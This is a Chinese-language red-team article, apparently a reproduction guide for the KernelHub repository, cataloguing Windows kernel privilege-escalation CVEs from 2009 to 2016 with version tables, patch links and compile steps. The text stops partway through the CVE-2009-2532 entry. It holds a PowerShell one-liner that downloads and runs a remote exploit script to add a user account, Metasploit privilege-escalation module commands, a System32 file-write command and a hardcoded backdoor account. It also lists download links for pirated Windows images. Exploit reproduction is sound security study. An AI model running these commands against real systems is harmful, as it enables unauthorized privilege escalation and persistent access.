声明
郑重声明:文中所涉及的技术、思路和工具仅供以安全为目的的学习交流使用,任何人不得将其用于非法用途以及盈利等目的,否则后果自行承担!
前言
这篇文章是基于红蓝功防中的一个小结提取出来的文章,主要都是一些CVE的利用
文章所使用的源码地址
各位师傅麻烦点个Star
https://github.com/Ascotbe/KernelHub
复现环境
-
系统环境
#Windows 7 SP1 X64
ed2k://|file|cn_windows_7_home_premium_with_sp1_x64_dvd_u_676691.iso|3420557312|1A3CF44F3F5E0BE9BBC1A938706A3471|/
#Windows 7 SP1 X86
ed2k://|file|cn_windows_7_home_premium_with_sp1_x86_dvd_u_676770.iso|2653276160|A8E8BD4421174DF34BD14D60750B3CDB|/
#Windows Server 2008 R2 SP1 X64
ed2k://|file|cn_windows_server_2008_r2_standard_enterprise_datacenter_and_web_with_sp1_x64_dvd_617598.iso|3368839168|D282F613A80C2F45FF23B79212A3CF67|/
#Windows Server 2003 R2 SP2 x86
ed2k://|file|cn_win_srv_2003_r2_enterprise_with_sp2_vl_cd1_X13-46432.iso|637917184|284DC0E76945125035B9208B9199E465|/
#Windows Server 2003 R2 SP2 x64
ed2k://|file|cn_win_srv_2003_r2_enterprise_x64_with_sp2_vl_cd1_X13-47314.iso|647686144|107F10D2A7FF12FFF0602FF60602BB37|/
#Windows Server 2008 SP2 x86
ed2k://|file|cn_windows_server_standard_enterprise_and_datacenter_with_sp2_x86_dvd_x15-41045.iso|2190057472|E93B029**42F19024AA9EF8FB02AC90B|/
#Windows Server 2000 SP4 x86
ed2k://|file|ZRMPSEL_CN.iso|402690048|00D1BDA0F057EDB8DA0B29CF5E188788|/
#Windows Server 2003 SP2 x86
thunder://QUFodHRwOi8vcy5zYWZlNS5jb20vV2luZG93c1NlcnZlcjIwMDNTUDJFbnRlcnByaXNlRWRpdGlvbi5pc29aWg==
#Windows 8.1 x86
ed2k://|file|cn_windows_8_1_enterprise_x86_dvd_2972257.iso|3050842112|6B60ABF8282F943FE92327463920FB67|/
#Windows 8.1 x64
ed2k://|file|cn_windows_8_1_x64_dvd_2707237.iso|4076017664|839CBE17F3CE8411E8206B92658A91FA|/
#Windows 10 1709 x64
ed2k://|file|cn_windows_10_multi-edition_vl_version_1709_updated_dec_2017_x64_dvd_100406208.iso|5007116288|317BDC520FA2DD6005CBA8293EA06DF6|/
#Windows 10 2004 x64 (2020-05-21 release version)
magnet:?xt=urn:btih:8E49569FDE852E4F3CCB3D13EFB296B6B02D82A6 -
所需Linux编译环境
sudo vim /etc/apt/sources.list
#在sources.list末尾添加deb http://us.archive.ubuntu.com/ubuntu trusty main universe
sudo apt-get update
sudo apt-get install mingw32 mingw32-binutils mingw32-runtime
sudo apt-get install gcc-mingw-w64-i686 g++-mingw-w64-i686 mingw-w64-tools -
所需Windows编译环境
VS2019(内置V142、V141、V120、V110、V120_xp、V110_xp、MFC)
CVE-2016-0095
描述
漏洞的原理是空指针解引用,导致Win32k内核提权漏洞的产生
影响版本
| Product | Version | Update | Edition | Tested |
|---|---|---|---|---|
| Windows 10 | - | |||
| Windows 10 | 1511 | |||
| Windows 7 | - | SP1 | ✔️ | |
| Windows 8.1 | - | |||
| Windows Rt 8.1 | - | |||
| Windows Server 2008 | SP2 | |||
| Windows Server 2008 | R2 | SP1 | ✔️ | |
| Windows Server 2012 | - | |||
| Windows Server 2012 | R2 | |||
| Windows Vista | SP2 |
修复补丁
https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2016-0095
利用方式
项目中的x64版本对于windows 7 sp1 x64和windows server 2008 R2 sp1 x64可以完美利用,项目中的x86版本只能对windows7利用(关闭窗口后会导致蓝屏)
测试windows 7 sp1 x64的GIF图
CVE-2016-0099
描述
此漏洞影响从Vista到Windows 10的所有Windows版本(包括服务器版本)以及为了实现利用,因为PowerShell脚本指示需要满足以下要求:目标系统需要有2个以上的CPU核心 PowerShell v2.0及更高版本必须正在运行
影响版本
| Product | Version | Update | Edition | Tested |
|---|---|---|---|---|
| Windows 10 | - | |||
| Windows 10 | 1511 | |||
| Windows 7 | - | SP1 | ✔️ | |
| Windows 8.1 | - | |||
| Windows Rt 8.1 | - | |||
| Windows Server 2008 | SP2 | ✔️ | ||
| Windows Server 2008 | R2 | SP1 | ✔️ | |
| Windows Server 2012 | - | |||
| Windows Server 2012 | R2 | |||
| Windows Vista | SP2 |
修复补丁
https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2016-0099
利用方式
目标系统需要有2个以上的CPU核心
PS脚本测试,在Windows server 2008 R2 sp1 x64执行下面命令
Import-Module .\Invoke-MS16-032.ps1
Invoke-MS16-032
还能远程添加账户
powershell -nop -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/Ridter/Pentest/master/powershell/MyShell/Invoke-MS16-032.ps1');Invoke-MS16-032 -Application cmd.exe -commandline '/c net user ascotbe test6666 /add'"
GIF图如下
利用exe文件测试通杀x64和x86的所有版本,这边只录制Windows 7 sp1 x64版本的
CVE-2016-0051
描述
该漏洞存在于Microsoft Web 分布式创作和版本管理 (WebDAV)中,如果 Microsoft Web 分布式创作和版本管理 (WebDAV) 客户端验证输入不当,那么其中就会存在特权提升漏洞。成功利用此漏洞的攻击者可以使用提升的特权执行任意代码。
影响版本
| Product | Version | Update | Edition | Tested |
|---|---|---|---|---|
| Windows 10 | - | |||
| Windows 10 | 1511 | |||
| Windows 7 | SP1 | ✔️ | ||
| Windows 8.1 | ||||
| Windows Rt 8.1 | ||||
| Windows Server 2008 | SP2 | |||
| Windows Server 2008 | R2 | SP1 | ||
| Windows Server 2012 | - | |||
| Windows Server 2012 | R2 | |||
| Windows Vista | SP2 |
修复补丁
https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2016-0051
利用方式
编译方式
-
VS2019(V140)X86 Debug
需要把CVE-2016-0051_x86.zip解压后的两个文件放到目标中
CVE-2015-2546
描述
微软安全公告MS15-097修复了Microsoft Graphics组件中多个内核漏洞。其中Win32k内存损坏特权提升漏洞:CVE-2015-2546该漏洞是FireEye在9月8日发布的一份攻击报告中发现的,攻击者利用该漏洞可获得系统SYSTEM权限。
影响版本
| Product | Version | Update | Edition | Tested |
|---|---|---|---|---|
| Windows 10 | - | |||
| Windows 7 | - | SP1 | ✔️ | |
| Windows 8 | - | |||
| Windows 8.1 | - | |||
| Windows Rt | - | |||
| Windows Rt 8.1 | - | |||
| Windows Server 2008 | - | SP2 | ||
| Windows Server 2008 | R2 | SP1 | itanium | |
| Windows Server 2008 | R2 | SP1 | x64 | |
| Windows Server 2012 | - | |||
| Windows Server 2012 | R2 | |||
| Windows Vista | - | SP2 |
修复补丁
https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2015-2546
利用方式
编译环境
-
VS2019 (V142)X86 Release
当前只有x86版本的EXP,测试GIF图
CVE-2015-2370
描述
存在于DCOM/RPC中的漏洞,这个漏洞允许攻击者发起NTLM身份认证请求,然后便可以监听目标主机的TCP套接字通信数据了,将漏洞利用的方式改为向目标主机磁盘的任意位置写入任意文件
影响版本
| Product | Version | Update | Edition | Tested |
|---|---|---|---|---|
| Windows 2003 Server | SP2 | |||
| Windows 2003 Server | R2 | SP2 | ||
| Windows 7 | - | SP1 | ✔️ | |
| Windows 8 | - | |||
| Windows 8.1 | - | ✔️ | ||
| Windows Rt | - | |||
| Windows Rt 8.1 | - | |||
| Windows Server 2008 | - | SP2 | ||
| Windows Server 2008 | R2 | SP1 | ||
| Windows Server 2012 | - | |||
| Windows Server 2012 | R2 | datacenter | ||
| Windows Server 2012 | R2 | essentials | ||
| Windows Server 2012 | R2 | standard | ||
| Windows Vista | SP2 |
修复补丁
https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2015-2370
利用方式
编译方式
-
VS2019 Any CPU Release
x64/x86 Windows 7/8.1都可以利用成功,这个漏洞就是可以像任意文件目录写入文件,就比如说我在c:\windows\system32\这个目录没有权限写入文件,但是我可以利用漏洞在这个文件写入文件
#把桌面的test.txt文件写入到System32文件夹中
Trebuchet.exe c:\Users\ascotbe\Desktop\test.txt c:\Windows\System32\test1.txt
CVE-2015-0003
描述
允许本地用户通过精心设计的应用程序(也称为“ Win32k特权提升漏洞”)获得特权或导致拒绝服务(取消引用空指针)。
影响版本
| Product | Version | Update | Edition | Tested |
|---|---|---|---|---|
| Windows 7 | - | SP1 | ✔️ | |
| Windows 8 | - | |||
| Windows 8.1 | - | |||
| Windows Rt | - | |||
| Windows Rt 8.1 | - | |||
| Windows Server 2003 | - | SP2 | ||
| Windows Server 2008 | - | SP2 | ||
| Windows Server 2008 | R2 | SP1 | itanium | |
| Windows Server 2008 | R2 | SP1 | x64 | |
| Windows Server 2012 | - | |||
| Windows Server 2012 | R2 | |||
| Windows Vista | - | SP2 |
修复补丁
https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2015-0003
利用方式
X86机器利用
编译方式
-
VS2019 (V120_xp)X86 Release
利用windows 7 sp1 x86作为演示
x64利用
编译方式
-
VS2019 (V142)X64 Release
利用Windows server 2008 R2 sp1 x64进行测试
CVE-2015-1725
描述
这个是一个位于 win32k.sys 的释放后重用漏洞。 漏洞的起因是没有为用户模式回调函数给窗口内核类型加锁, 该漏洞可以由 win32k.sys 中的 xxxSetClassLong 函数触发。 成功利用该漏洞将导致特权提升到“NT AUTHORITY/SYSTEM”。
影响版本
| Product | Version | Update | Edition | Tested |
|---|---|---|---|---|
| Windows 7 | - | SP1 | ||
| Windows 8 | - | |||
| Windows 8.1 | - | |||
| Windows Rt | - | |||
| Windows Rt 8.1 | - | |||
| Windows Server 2003 | - | SP2 | ||
| Windows Server 2003 | R2 | SP2 | ||
| Windows Server 2008 | - | SP2 | ||
| Windows Server 2008 | R2 | SP1 | itanium | |
| Windows Server 2008 | R2 | SP1 | x64 | |
| Windows Server 2012 | - | |||
| Windows Server 2012 | R2 | |||
| Windows Vista | - | SP2 |
修复补丁
https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2015-1725
利用方式
暂无
CVE-2015-1701
描述
如果 Win32k.sys 内核模式驱动程序不正确地处理内存中的对象,则存在一个特权提升漏洞。 成功利用此漏洞的攻击者可以运行内核模式中的任意代码。
影响版本
| Product | Version | Update | Edition | Tested |
|---|---|---|---|---|
| Windows 2003 Server | SP2 | |||
| Windows 7 | - | SP1 | x64 | |
| Windows Server 2008 | - | SP2 | ||
| Windows Vista | SP2 |
修复补丁
https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2015-1701
利用方式
编译方式
-
VS2019 (V140)X64 Release
-
VS2019 (V140)X86 Release
x86利用
测试机器 windows 7 sp1 x86
x64利用
测试使用windows server 2008 R2 sp1 x64
CVE-2015-0062
描述
允许本地用户通过精心设计的应用程序获取特权,这些应用程序在使用过程中利用了不正确的模拟处理 SeAssignPrimaryTokenPrivilege特权。
影响版本
| Product | Version | Update | Edition | Tested |
|---|---|---|---|---|
| Windows 7 | - | SP1 | ||
| Windows 8 | - | |||
| Windows 8.1 | - | |||
| Windows Rt | - | |||
| Windows Rt 8.1 | - | |||
| Windows Server 2008 | R2 | SP1 | itanium | |
| Windows Server 2008 | R2 | SP1 | x64 | |
| Windows Server 2012 | - | |||
| Windows Server 2012 | R2 |
修复补丁
https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2015-0062
利用方式
暂无
CVE-2015-0057
描述
内核模式驱动程序中的win32k.sys允许本地用户通过精心设计的应用程序获得特权
影响版本
| Product | Version | Update | Edition | Tested |
|---|---|---|---|---|
| Windows 7 | - | SP1 | ✔️ | |
| Windows 8 | - | |||
| Windows 8.1 | - | |||
| Windows Rt | - | |||
| Windows Rt 8.1 | - | |||
| Windows Server 2003 | - | SP2 | ||
| Windows Server 2008 | - | SP2 | ||
| Windows Server 2008 | R2 | SP1 | itanium | ✔️ |
| Windows Server 2008 | R2 | SP1 | x64 | ✔️ |
| Windows Server 2012 | - | |||
| Windows Server 2012 | R2 | |||
| Windows Vista | - | SP2 |
修复补丁
https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2015-0057
利用方式
目前有两个源码
-
CVE-2015-0057_win8.1文件夹下面的针对Windows8.1的源码,可行性未测试
-
exploit-db下载下来的源码也未测试
测试使用的是网上找到的编译好的EXPCVE-2015-0057_x86和CVE-2015-0057_x64,可以对Windows7/2008利用成功,会添加用户账号k8team$ 密码K8TeAm520!@#
对Windows 7 sp1 x86进行测试
CVE-2015-0002
描述
应用程序兼容性组件中的ahcache.sys中的ahcache.sys中的AhcVerifyAdminContext函数不会验证模拟令牌 与一个管理帐户关联,该帐户允许本地用户通过使用精心制作的DLL文件运行AppCompatCache.exe来获得特权。
影响版本
| Product | Version | Update | Edition | Tested |
|---|---|---|---|---|
| Windows 7 | - | SP1 | ||
| Windows 8 | - | |||
| Windows 8.1 | - | |||
| Windows Rt | - | Gold | ||
| Windows Rt 8.1 | - | |||
| Windows Server 2008 | R2 | SP1 | ||
| Windows Server 2012 | - | Gold | ||
| Windows Server 2012 | R2 | x64 |
修复补丁
https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2015-0002
利用方式
暂无
CVE-2014-4076
描述
本地用户通过对tcpip.sys或tcpip6.sys的精心制作的IOCTL调用来获得特权。
影响版本
| Product | Version | Update | Edition | Tested |
|---|---|---|---|---|
| Windows Server 2003 | SP2 | x86 | ||
| Windows Server 2003 | SP2 | tanium | ||
| Windows Server 2003 | SP2 | x64 |
修复补丁
https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2014-4076
利用方式
编译环境
i586-mingw32msvc-gcc CVE-2014-4076.c -o CVE-2014-4076.exe
CVE-2014-4113
描述
如果 Win32k.sys 内核模式驱动程序不正确地处理内存中的对象,则存在一个特权提升漏洞。 成功利用此漏洞的攻击者可以运行内核模式中的任意代码。
影响版本
| Product | Version | Update | Edition | Tested |
|---|---|---|---|---|
| Windows 7 | - | SP1 | ✔️ | |
| Windows 8 | - | |||
| Windows 8.1 | - | |||
| Windows Rt | - | Gold | ||
| Windows Rt 8.1 | - | |||
| Windows Server 2003 | SP2 | |||
| Windows Server 2008 | SP2 | |||
| Windows Server 2008 | R2 | SP1 | ||
| Windows Server 2012 | - | Gold | ||
| Windows Server 2012 | R2 | |||
| Windows Vista | SP2 |
修复补丁
https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2014-4113
利用方式
目前只有x86版本的源码,x64源码没有找到
编译方式
-
VS2019 (V140)X86 Release
x86利用
测试系统Windows 7 sp1 x86
x64利用
测试系统Windows 7 sp1 x64
CVE-2014-6321
描述
Schannel允许远程攻击者通过精心设计的数据包远程执行代码
影响版本
| Product | Version | Update | Edition | Tested |
|---|---|---|---|---|
| Windows 7 | - | SP1 | ||
| Windows 8 | - | |||
| Windows 8.1 | - | |||
| Windows Rt | - | |||
| Windows Rt 8.1 | - | |||
| Windows Server 2003 | - | SP2 | ||
| Windows Server 2008 | - | SP2 | ||
| Windows Server 2008 | R2 | SP1 | itanium | |
| Windows Server 2008 | R2 | SP1 | x64 | |
| Windows Server 2012 | - | |||
| Windows Server 2012 | R2 | |||
| Windows Vista | - | SP2 |
修复补丁
https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2014-6321
利用方式
暂无
CVE-2014-1767
描述
内核模式驱动程序中afd.sys的辅助功能驱动程序(AFD)中的双重释放漏洞允许本地用户通过精心设计的应用程序获得特权。
影响版本
| Product | Version | Update | Edition | Tested |
|---|---|---|---|---|
| Windows 7 | SP1 | ✔️ | ||
| Windows 8 | ||||
| Windows 8.1 | ||||
| Windows Rt | - | |||
| Windows Rt 8.1 | - | |||
| Windows Server 2003 | SP2 | |||
| Windows Server 2008 | SP2 | |||
| Windows Server 2008 | R2 | SP1 | ||
| Windows Server 2012 | - | |||
| Windows Server 2012 | R2 | |||
| Windows Vista | SP2 |
修复补丁
https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2014-1767
利用方式
利用脚本是python的,还有编译好的exe版本
x86利用
测试系统Windows 7 sp1 x86 ,测试exe文件和py脚本都可以正常利用
x64利用
测试系统Windows 7 sp1 x64 测试利用py脚本,exe文件有机率蓝屏
CVE-2014-4076
描述
本地用户通过对tcpip.sys或tcpip6.sys的精心制作的IOCTL调用来获得特权。
影响版本
| Product | Version | Update | Edition | Tested |
|---|---|---|---|---|
| Windows Server 2003 | SP2 | x64 | ||
| Windows Server 2003 | SP2 | x86 | ✔️ | |
| Windows Server 2003 | SP2 | itanium |
修复补丁
https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2014-4076
利用方式
编译环境
i586-mingw32msvc-gcc CVE-2014-4076.c -o CVE-2014-4076.exe
CVE-2013-5065
描述
内核中的NDProxy.sys允许本地用户通过精心设计的应用程序获得特权
影响版本
| Product | Version | Update | Edition | Tested |
|---|---|---|---|---|
| Windows 2003 Server | SP2 | |||
| Windows Xp | SP2 | |||
| Windows Xp | SP3 |
修复补丁
https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2013-5065
利用方式
暂无
i586-mingw32msvc-gcc CVE-2013-5065.c -o CVE-2013-5065.exe
CVE-2013-1345
描述
内核模式驱动程序中的win32k.sys不会 正确处理内存中的对象,这允许本地用户通过精心设计的应用程序获得特权。
影响版本
| Product | Version | Update | Edition | Tested |
|---|---|---|---|---|
| Windows 7 | SP1 | X64 | ||
| Windows 7 | SP1 | X86 | ✔️ | |
| Windows 8 | - | - | X64 | |
| Windows 8 | - | - | X86 | |
| Windows Rt | - | |||
| Windows Server 2003 | SP2 | |||
| Windows Server 2003 | SP2 | Itanium | ||
| Windows Server 2003 | SP2 | X64 | ||
| Windows Server 2008 | SP2 | Itanium | ||
| Windows Server 2008 | SP2 | X64 | ||
| Windows Server 2008 | SP2 | X86 | ✔️ | |
| Windows Server 2008 | R2 | SP1 | Itanium | ✔️ |
| Windows Server 2008 | R2 | SP1 | X64 | |
| Windows Server 2012 | - | |||
| Windows Vista | SP2 | |||
| Windows Vista | SP2 | X64 | ||
| Windows Xp | - | SP2 | X64 | |
| Windows Xp | SP3 |
修复补丁
https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2013-1345
利用方式
X86利用
测试系统windows 7 sp1 x86 ,直接使用msf即可,我们当机器已经上线了
use exploit/windows/local/ms13_053_schlamperei
set SESSION 2 #你上线机器的session
run
Windows sever 2003 sp2 x86 和Windows sever 2003 R2 sp2 x86都测试成功,但是利用文件没有源码只有exe可执行文件
Windows sever 2003 sp2 x86 动图如下
Windows sever 2003 R2 sp2 x86 动图如下
CVE-2013-1332
描述
核模式驱动程序中的dxgkrnl.sys(aka DirectX图形内核子系统) 在内存中,本地用户可以通过精心设计的应用程序获得特权。
影响版本
| Product | Version | Update | Edition | Tested |
|---|---|---|---|---|
| Windows 7 | - | SP1 | X64 | |
| Windows 7 | - | SP1 | X86 | |
| Windows 8 | - | - | X64 | |
| Windows 8 | - | - | X86 | |
| Windows Rt | - | |||
| Windows Server 2003 | SP2 | |||
| Windows Server 2008 | SP2 | Itanium | ||
| Windows Server 2008 | SP2 | X64 | ||
| Windows Server 2008 | SP2 | X86 | ||
| Windows Server 2008 | R2 | SP1 | X64 | |
| Windows Server 2008 | R2 | SP1 | Itanium | |
| Windows Server 2012 | - | |||
| Windows Vista | - | SP2 | ||
| Windows Vista | SP2 | X64 |
修复补丁
https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2013-1332
利用方式
编译环境
-
VS2019(V120_xp)X64 Release
-
VS2019(V120_xp)X86 Release
-
字符集需要替换成多字节字符集不然无法利用
测试系统windows server 2003 SP2
CVE-2013-0008
描述
内核模式驱动程序中的win32k.sys无法正确处理窗口广播消息, 它允许本地用户通过精心设计的应用程序获得特权
影响版本
| Product | Version | Update | Edition | Tested |
|---|---|---|---|---|
| Windows 7 | - | SP1 | X64 | |
| Windows 7 | X64 | |||
| Windows 7 | X86 | |||
| Windows 7 | SP1 | X86 | ||
| Windows 8 | - | - | X64 | |
| Windows 8 | - | - | X86 | |
| Windows Rt | - | |||
| Windows Server 2008 | - | SP2 | Itanium | |
| Windows Server 2008 | SP2 | X64 | ||
| Windows Server 2008 | SP2 | X86 | ||
| Windows Server 2008 | R2 | Itanium | ||
| Windows Server 2008 | R2 | X64 | ||
| Windows Server 2008 | R2 | SP1 | Itanium | |
| Windows Server 2008 | R2 | SP1 | X64 | |
| Windows Server 2012 | - | |||
| Windows Vista | SP2 | |||
| Windows Vista | SP2 | X64 |
修复补丁
https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2013-0008
利用方式
msf 利用失败
CVE-2012-0217
描述
某些其他操作系统(在Intel处理器上运行时)在某些地址不是规范地址的情况下会错误地使用sysret路径,从而使本地用户可以通过精心设计的应用程序获得特权
影响版本
| Product | Version | Update | Edition | Tested |
|---|---|---|---|---|
| Windows 7 | SP1 | X64 | ||
| Windows 7 | X64 | |||
| Windows Server 2003 | SP2 | |||
| Windows Server 2008 | R2 | X64 | ||
| Windows Server 2008 | R2 | SP1 | X64 | ✔️ |
| Windows Xp | SP3 |
修复补丁
https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2012-0217
利用方式
编译环境
-
VS2019(V100)X64 Release
测试系统windows server 2008 R2 ps1 x64
CVE-2011-2005
描述
辅助功能驱动程序中的afd.sys无法正确验证传递给内核模式的用户模式输入,这允许本地用户通过精心设计的应用程序获得特权。
影响版本
| Product | Version | Update | Edition | Tested |
|---|---|---|---|---|
| Windows 2003 Server | SP2 | |||
| Windows Server 2003 | SP2 | Itanium | ✔️ | |
| Windows Server 2003 | SP2 | X64 | ||
| Windows Xp | - | SP2 | X64 | |
| Windows Xp | SP3 |
修复补丁
https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2011-2005
利用方式
测试系统windows server 2003 sp2 x86
msf利用直接使用这个即可
use exploit/windows/local/ms11_080_afdjoinleaf
CVE-2011-1974
描述
远程访问服务(RAS)中的NDISTAPI驱动程序中的NDISTAPI.sys无法正确验证用户模式输入,这允许本地用户通过精心设计的应用程序获得特权
影响版本
| Product | Version | Update | Edition | Tested |
|---|---|---|---|---|
| Windows 2003 Server | SP2 | |||
| Windows Server 2003 | SP2 | Itanium | ||
| Windows Server 2003 | SP2 | X64 | ||
| Windows Xp | - | SP2 | X64 | |
| Windows Xp | SP3 |
修复补丁
https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2011-1974
利用方式
编译命令
i686-w64-mingw32-gcc CVE-2011-1974.c -o CVE-2011-1974.exe -lws2_32
测试系统windows server 2003 sp2 x86,首先需要用管理员修改注册表和开启服务
接着切回普通用户
CVE-2011-1249
描述
afd.sys中的辅助功能驱动程序(AFD)未正确验证用户模式输入,从而使本地用户无法通过精心设计的应用程序获得特权。
影响版本
| Product | Version | Update | Edition | Tested |
|---|---|---|---|---|
| Windows 2003 Server | SP2 | |||
| Windows 7 | - | SP1 | X64 | |
| Windows 7 | - | SP1 | X86 | |
| Windows Server 2003 | SP2 | Itanium | ||
| Windows Server 2003 | SP2 | X64 | ||
| Windows Server 2008 | - | SP2 | Itanium | |
| Windows Server 2008 | X32 | |||
| Windows Server 2008 | X64 | |||
| Windows Server 2008 | SP2 | X32 | ||
| Windows Server 2008 | SP2 | X64 | ||
| Windows Server 2008 | Itanium | |||
| Windows Server 2008 | R2 | Itanium | ||
| Windows Server 2008 | R2 | X64 | ||
| Windows Server 2008 | R2 | SP1 | Itanium | |
| Windows Server 2008 | R2 | SP1 | X64 | |
| Windows Vista | SP1 | |||
| Windows Vista | SP2 | |||
| Windows Xp | - | SP2 | X64 | |
| Windows Xp | SP3 |
修复补丁
https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2011-1249
利用方式
编译文件
i686-w64-mingw32-gcc CVE-2011-1249.c -o CVE-2011-1249.exe -lws2_32
测试系统windows server 2003 sp2 x86和windows 7 sp1 x86都成功
CVE-2011-0045
描述
内核中的跟踪事件功能无法正确执行类型转换,这会导致整数截断和不足的内存分配并触发缓冲区溢出,从而使本地用户可以通过与WmiTraceMessageVa相关的精心设计的应用程序获得特权
影响版本
| Product | Version | Update | Edition | Tested |
|---|---|---|---|---|
| Windows Xp | SP3 |
修复补丁
https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2011-0045
利用方式
暂无
CVE-2010-4398
描述
win32k.sys中的RtlQueryRegistryValues函数中基于堆栈的缓冲区溢出 特权,并通过为SystemDefaultEUDCFont注册表项的特制REG_BINARY值来绕过用户帐户控制(UAC)功能。
影响版本
| Product | Version | Update | Edition | Tested |
|---|---|---|---|---|
| Windows 2003 Server | ||||
| Windows 7 | ||||
| Windows Server 2008 | Itanium | |||
| Windows Server 2008 | X32 | |||
| Windows Server 2008 | X64 | |||
| Windows Server 2008 | R2 | Itanium | ||
| Windows Server 2008 | R2 | X64 | ||
| Windows Vista | ||||
| Windows Xp |
修复补丁
https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2010-4398
利用方式
暂无
CVE-2010-3338
描述
Windows Task Scheduler无法正确确定计划任务的安全上下文,这使本地用户可以通过精心设计的应用程序获取特权
影响版本
| Product | Version | Update | Edition | Tested |
|---|---|---|---|---|
| Windows 7 | - | |||
| Windows Server 2008 | - | SP2 | Itanium | |
| Windows Server 2008 | X64 | |||
| Windows Server 2008 | SP2 | X32 | ||
| Windows Server 2008 | SP2 | X64 | ||
| Windows Server 2008 | Itanium | |||
| Windows Server 2008 | X32 | |||
| Windows Server 2008 | R2 | X64 | ||
| Windows Server 2008 | R2 | Itanium | ||
| Windows Vista | SP1 | |||
| Windows Vista | SP1 | X64 | ||
| Windows Vista | SP2 | |||
| Windows Vista | SP2 | X64 |
修复补丁
https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2010-3338
利用方式
测试系统 windows server 2008 sp2 x86,利用msf执行如下命令即可,x64版本msf不支持
use exploit/windows/local/ms10_092_schelevator
set SESSION 2
run
然后就能提权成功了
CVE-2010-2554
描述
服务跟踪功能在其注册表项上具有不正确的ACL,这使本地用户可以通过涉及命名管道和模拟的向量获得特权。
影响版本
| Product | Version | Update | Edition | Tested |
|---|---|---|---|---|
| Windows 7 | - | |||
| Windows Server 2008 | - | SP2 | Itanium | |
| Windows Server 2008 | R2 | Itanium | ||
| Windows Server 2008 | R2 | X64 | ||
| Windows Server 2008 | SP2 | X32 | ||
| Windows Server 2008 | Itanium | |||
| Windows Server 2008 | SP2 | X64 | ||
| Windows Server 2008 | X32 | |||
| Windows Server 2008 | X64 | |||
| Windows Vista | - | SP1 | ||
| Windows Vista | - | SP2 | ||
| Windows Vista | SP1 | X64 | ||
| Windows Vista | SP2 | |||
| Windows Vista | SP2 | X64 | ||
| Windows Vista | SP1 |
修复补丁
https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2010-2554
利用方式
暂无
CVE-2010-1897
描述
win32k.sys中的Windows内核模式驱动程序无法正确验证伪句柄值 在窗口创建期间的回调参数中,它允许本地用户通过精心设计的应用程序获得特权。
影响版本
| Product | Version | Update | Edition | Tested |
|---|---|---|---|---|
| Windows 2003 Server | SP2 | |||
| Windows 2003 Server | SP2 | Itanium | ||
| Windows 7 | - | |||
| Windows 7 | ||||
| Windows Server 2003 | SP2 | X64 | ||
| Windows Server 2008 | - | SP2 | Itanium | |
| Windows Server 2008 | X64 | |||
| Windows Server 2008 | R2 | Itanium | ||
| Windows Server 2008 | R2 | X64 | ||
| Windows Server 2008 | SP2 | X32 | ||
| Windows Server 2008 | Itanium | |||
| Windows Server 2008 | SP2 | X64 | ||
| Windows Server 2008 | X32 | |||
| Windows Vista | - | SP1 | ||
| Windows Vista | SP1 | |||
| Windows Vista | SP1 | X64 | ||
| Windows Vista | SP2 | |||
| Windows Vista | SP2 | X64 | ||
| Windows Xp | - | SP2 | X64 | |
| Windows Xp | SP3 |
修复补丁
https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2010-1897
利用方式
测试系统windows server 2003 sp2 x86
CVE-2010-0233
描述
内核中的双重免费漏洞允许本地用户通过精心设计的应用程序获得特权。
影响版本
| Product | Version | Update | Edition | Tested |
|---|---|---|---|---|
| Windows 2000 | SP4 | |||
| Windows Server 2003 | SP2 | |||
| Windows Server 2008 | - | SP2 | Itanium | |
| Windows Server 2008 | SP2 | X64 | ||
| Windows Server 2008 | Itanium | |||
| Windows Server 2008 | X32 | |||
| Windows Server 2008 | X64 | |||
| Windows Server 2008 | SP2 | X32 | ||
| Windows Vista | ||||
| Windows Vista | SP1 | |||
| Windows Vista | SP2 | |||
| Windows Xp | - | |||
| Windows Xp | SP3 |
修复补丁
https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2010-0233
利用方式
编译环境
-
nmake 2013
测试系统windows server 2003 sp2 x86
msf利用
测试系统windows server 2003 sp2 x86,执行以下代码
use exploit/windows/local/ms10_015_kitrap0d
set SESSION 3
run
可以看到当前权限是最低的
然后执行命令提权
CVE-2010-0270
描述
SMB客户端无法正确验证SMB事务响应中的字段,这允许远程SMB服务器和中间人攻击者执行任意代码或导致拒绝服务(内存损坏和 通过SMBv1或SMBv2响应重新启动)。
影响版本
| Product | Version | Update | Edition | Tested |
|---|---|---|---|---|
| Windows 7 | - | |||
| Windows 7 | ||||
| Windows Server 2008 | R2 | Itanium | ||
| Windows Server 2008 | R2 | X64 |
修复补丁
https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2010-0270
利用方式
暂无
CVE-2009-2532
描述
无法正确处理SMB多协议协商请求数据包中的命令值,这使远程攻击者可以通过精心制作的SMBv2执行任意代码 数据包发送到服务器服务
影响版本
